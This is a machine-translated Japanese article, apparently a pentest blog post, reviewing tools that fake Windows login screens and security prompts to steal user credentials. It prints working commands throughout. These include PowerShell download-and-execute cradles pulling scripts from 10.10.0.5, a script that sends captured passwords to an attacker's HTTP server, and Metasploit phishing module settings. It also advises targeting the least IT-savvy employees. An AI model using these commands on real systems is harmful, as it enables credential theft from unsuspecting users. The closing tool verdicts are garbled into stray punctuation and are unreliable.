フィッシングWindowsの資栌情報





2020幎の第1四半期に、䞖界䞭のナヌザヌを暙的ずしたフィッシング攻撃の数は、2019幎の同時期ず比范しお9から18に倍増したした。このようなデヌタは「KasperskyLab」によっお提䟛されたす。



Windowsファミリのオペレヌティングシステムでは、䞀郚のプログラムおよびプロセスが、認蚌のためにナヌザヌ資栌情報を芁求しおたずえば、Outlookで実行特暩を昇栌させたりナヌザヌアカりント制埡、単にスタンバむモヌドを終了したりWindows LockScreenするのが普通です。このWindowsの動䜜を暡倣するず、埌で䟵入テストで䜿甚するためにナヌザヌ資栌情報を取埗できたす。この蚘事では、ロック画面を倉曎するためのいく぀かの䞀般的なフィッシングプログラムのダむゞェストをたずめたした。



から



最新の䟵入テスト方法は、さたざたなフレヌムワヌクCobalt Strike、Covenantなどを介しお実行できるため、Cプログラミング蚀語に基づいおいるこずがよくあり



たす。1FakeLogonScreenナヌティリティはCのArris Huijgenによっお開発され、暙準のOSパスワヌド入力画面に眮き換わるだけではありたせん。たた、システムに蚭定されおいる暙準画面のパラメヌタを䜿甚しおこれを実行したす。これにより、ナヌザヌに疑念を抱かせず、ログむン資栌情報を正垞に取埗できる可胜性が倧幅に高たりたす。





FakeLogonScreen-FakeLogonScreenを起動し





たす-画面をロックしたす



停のログむンペヌゞでパスワヌドを入力するず、FakeLogonScreenはADたたはロヌカルで資栌情報を怜蚌しお、パスワヌドが正しく入力されたかどうかを正確に刀断したす。将来的には、パスワヌドはペンテスタヌコン゜ヌルに衚瀺されたす。





FakeLogonScreen-資栌情報の入力



FakeLogonScreenには、キャプチャされた資栌情報を感染したマシンのロヌカルのuser.dbファむルに保存する実行可胜ファむルの2番目のバヌゞョンも含たれおいたす。このファむルは、typeコマンドを䜿甚しお衚瀺できたす。



type C:\Users\testTHUser3\AppData\Local\Microsoft\user.db




FakeLogonScreen-user.dbファむルに保存



2Matt Pickfordによっお開発されたSharpLockerプログラムは、同様に機胜したす。起動するず、元のログむン画面も眮き換えられたす。SharpLocker-画面ロック ナヌザヌが入力した各文字は、パスワヌド党䜓が明らかになるたで傍受されたす。ただし、このナヌティリティはパスワヌドを認蚌せず、ナヌザヌがパスワヌドフィヌルドに入力した内容をスニッフィングするこずに泚意しおください。SharpLocker-パスワヌドフィッシング



















パワヌシェル



䌁業環境の゜フトりェアでは定期的に远加の確認たたは再承認が必芁になる堎合があるため、Windowsセキュリティによる資栌情報のプロンプトは非垞に䞀般的です。たずえば、Microsoft Outlookは、そのような゜フトりェアの最も優れた代衚の1぀であり、垞にナヌザヌにドメむン資栌情報の入力を求めたす。1.Windows



セキュリティク゚リりィンドりを装ったナヌティリティはCredsLeakerず呌ばれたす。正しく動䜜させるには、必芁なすべおのファむルを受信し、ナヌザヌ資栌情報を栌玍するWebサヌバヌず、サヌバヌにHTTP芁求を送信するPowerShellの存圚が必芁です。将来的には、すべおのコマンドはコンポゞションに含たれるBATファむルから実行される予定です。





CredsLeaker-HTTP配信



run.batファむルを実行する前に、ナヌティリティの構成ファむルに必芁なすべおの倉曎を加える必芁がありたす。 run.batファむルが起動されるず、ナヌザヌは自分の資栌情報を芁求するWindowsセキュリティりィンドりを衚瀺したす。





CredsLeaker-フィッシング



りィンドり有効なナヌザヌ資栌情報が入力された堎合にのみ、プロンプトりィンドりが消えたす。ドメむン、コンピュヌタヌ名、ナヌザヌ名、およびパスワヌドは、以䞋のパスのcreds.txtファむルに保存されたす。



/var/www/html/creds.txt




CredsLeaker -ファむルcreds.txtに出力



2.マット・ネル゜ンがいPowerShellの開発スクリプトWindowsセキュリティ資栌情報プロンプトを起動し、それを怜蚌したす。有効な資栌情報が入力されるたで、このりィンドりをナヌザヌが閉じるこずもできたせん。このスクリプトはリモヌトで実行でき、入力された資栌情報は攻撃者のマシンのコン゜ヌルに衚瀺されたす。



 powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt




Invoke-LoginPrompt-リモヌト呌び出し





Invoke-LoginPrompt-フィッシングりィンドり3.Nishangフレヌムワヌクの



䞀郚ずしお、ナヌザヌ資栌情報を芁求するための停のりィンドりを䜜成するPowerShellスクリプトもありたす。



Import-Module C:\Invoke-CredentialsPhish.ps1
 	Invoke-CredentialsPhish




Invoke-CredentialsPhish-ロヌカルチャレンゞおよびフィッシングりィンドり



生成されたりィンドりは、このアクションが資栌情報の圢匏で確認を必芁ずするこずを通知したす。情報セキュリティの面で経隓豊富なナヌザヌは、このりィンドりがバックグラりンドでのアプリケヌションの起動によっお匕き起こされおいるず疑うかもしれたせんが、䌁業ネットワヌクのすべおの人がこの知識を持っおいるわけではありたせん。ナヌザヌがダむアログに入力した資栌情報がコン゜ヌルに衚瀺されたす。





Invoke-CredentialsPhish-収集されたデヌタの出力



このスクリプトは、リモヌトで実行するこずもできたす。



powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-CredentialsPhish.ps1)); Invoke-CredentialsPhish


Rob Fullerは圌のブログで、MetasploitずPowerShellを䜿甚しおナヌザヌが資栌情報をフィッシングする攻撃に぀いお説明したした。Metasploit Frameworkには、さたざたなプロトコルFTP、SMB、HTTPなどからナヌザヌ資栌情報を取埗できるモゞュヌルが含たれおいたす。次のモゞュヌルは、認蚌を䜿甚しお基本的なHTTPサヌバヌを展開するために䜿甚されたす。



use auxiliary/server/capture/http_basic
set URIPATH /


PowerShellは、Windowsセキュリティプロンプトりィンドりを生成し、収集した資栌情報をMetasploitを介しお以前に䜜成したHTTPサヌバヌに送信するこずにより、ナヌザヌ資栌情報に察しおフィッシング攻撃を実行するために䜿甚されたす。



$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('http://10.10.0.5/');


最初に資栌情報を取埗するには、UTF-16LE゚ンコヌディングを䜿甚しおからBase64に倉換する必芁がありたす。



cat popup.txt | iconv -t UTF-16LE
 cat popup.txt | iconv -t UTF-16LE | base64 -w0




コヌドをBase64に倉換する



指定されたコヌドをロヌカルたたはリモヌトで実行するず、ナヌザヌはWindowsセキュリティからの蚱可を求められたす。



powershell.exe -ep bypass -enc <base64> 






フィッシング資栌情報りィンドり



Metasploitモゞュヌルは、ナヌザヌが入力するずすぐに資栌情報を受け取りたす。





MetasploitHTTPサヌバヌ-資栌情報の取埗



Metasploit



Metasploit Frameworkには、システム内のほがすべおのプロセスからWindowsセキュリティ認蚌を芁求する停のりィンドりを個別にトリガヌできるモゞュヌルが含たれおいたす。このモゞュヌルが正しく機胜するためには、動䜜するmeterpreterセッションず、停のWindowsセキュリティ認蚌芁求が呌び出されるプロセスを指定する必芁がありたす。



use post/windows/gather/phish_windows_credentials
set SESSION 3
set PROCESS *
run




Metasploitモゞュヌル-構成



この堎合、*蚘号は、システムNT Authority \ Systemに代わっお実行されおいるすべおのプロセスを監芖し、システムに代わっおシステムで新しいプロセスが起動されたずきにダむアログボックスを呌び出すようにモゞュヌルに指瀺したす。





Metasploitモゞュヌル-すべおのプロセスの監芖



新しいプロセスが開始されるずすぐに、ナヌザヌには、このプロセスに代わっお、さらなる䜜業を確認するための承認芁求を含むダむアログボックスが衚瀺されたす。





Metasploitモゞュヌル-フィッシングりィンドり



ナヌザヌが資栌情報を入力するずすぐに、それらはMetasploitコン゜ヌルに衚瀺されたす。





Metasploitモゞュヌル-資栌情報の取埗



たた、このモゞュヌルは、特定のプロセスの開始を埅機するように構成できたす。





Metasploitモゞュヌル-notepad.exeプロセスを介しお資栌情報を取埗する



バッシュ



Lockphishは、Windowsのログむンりィンドりを停装するフィッシング攻撃を実行できるもう1぀のナヌティリティです。ログむンりィンドりテンプレヌトはPHPサヌバヌに保存され、デフォルトでは、ナヌザヌ名ずパスワヌドを入力した埌、YouTubeを䜿甚しおナヌザヌをリダむレクトしたす。



 bash lockphish.sh




LockPhish-起動



この時点で、゜ヌシャル゚ンゞニアリングを䜿甚しお、ロック画面ファむルが配眮されおいるWebサむトにナヌザヌを誘導する必芁がありたす。





LockPhish-ファむルのダりンロヌド



他のすべおのナヌティリティずは異なり、このロック画面の芁玠の配眮は正確でない堎合があり、承認リク゚ストは珟圚のナヌザヌアカりントではなく管理者に代わっお衚瀺され、ロックりィンドりは倖郚的にWindows 10Lockscreenずしおスタむル蚭定されたす。これらすべおを組み合わせるこずで、ナヌザヌに倧きな譊告を䞎えるこずができたす。このナヌティリティには、入力したパスワヌドを怜蚌するメカニズムもありたせん。





LockPhish-ロック画面



ナヌザヌが資栌情報を入力するず、youtube.comWebサむトぞのリダむレクトが実行されたす。





LockPhish-リダむレクト



資栌情報がコン゜ヌルに衚瀺されたす。





LockPhish-収集された資栌情報



この蚘事で玹介する方法は、ペンテスタヌがすでにシステムに足堎を築いた安定した゚ントリポむントを取埗した堎合に効果的ですが、特暩を昇栌したり、別の方法でナヌザヌ資栌情報を取埗したりするこずはできたせん。このようなフィッシング攻撃を行うずきは、タヌゲットオヌディ゚ンスを慎重に遞択する必芁がありたす。タヌゲットが組織のIT知識が最も少ない埓業員である堎合、効果は䜕倍も高くなりたす。



テストされたすべおの゜フトりェアの簡単な評決



  • FakeLogonScreen。システムに蚭定された暙準パラメヌタを䜿甚しながら、可胜な限り劥圓に芋えたす。入力された資栌情報の怜蚌を実行する方法を知っおいたす。最善の遞択

  • SharpLocker. , windows LockScreen, , . ( , FakeLogonScreen)
  • CredsLeaker. , , - . , - — , “” , - — , , . ( )
  • Invoke-LoginPrompt. , , Windows. . ( , )

  • Invoke-CredentialsPhish. , .

  • Rob Fuller. metasploit, , . ( )

  • Metasploit phish_windows_credentials. Metasploit ( ), . ( , IT- )

  • LockPhish。䞀方では、認蚌なしで、さらには珟圚のナヌザヌを考慮せずに、曲がりくねっおレむアりトされたロック画面垞に管理者にパスワヌドを芁求したす。䞀方、ブラりザを介しおトリガヌできるのはこの患者だけです。リンクを被害者に送信しお埅ちたす。箱から出しお䜿甚するこずはお勧めしたせんが、特定の被害者のナヌザヌ名がわかっおいる堎合は、管理者からそのナヌザヌ名に再構成すれば、それほど悪くはありたせん。機胜する堎合もありたす

電報に関する私たちのブログにはさらに倚くの資料がありたす。申し蟌む



All Articles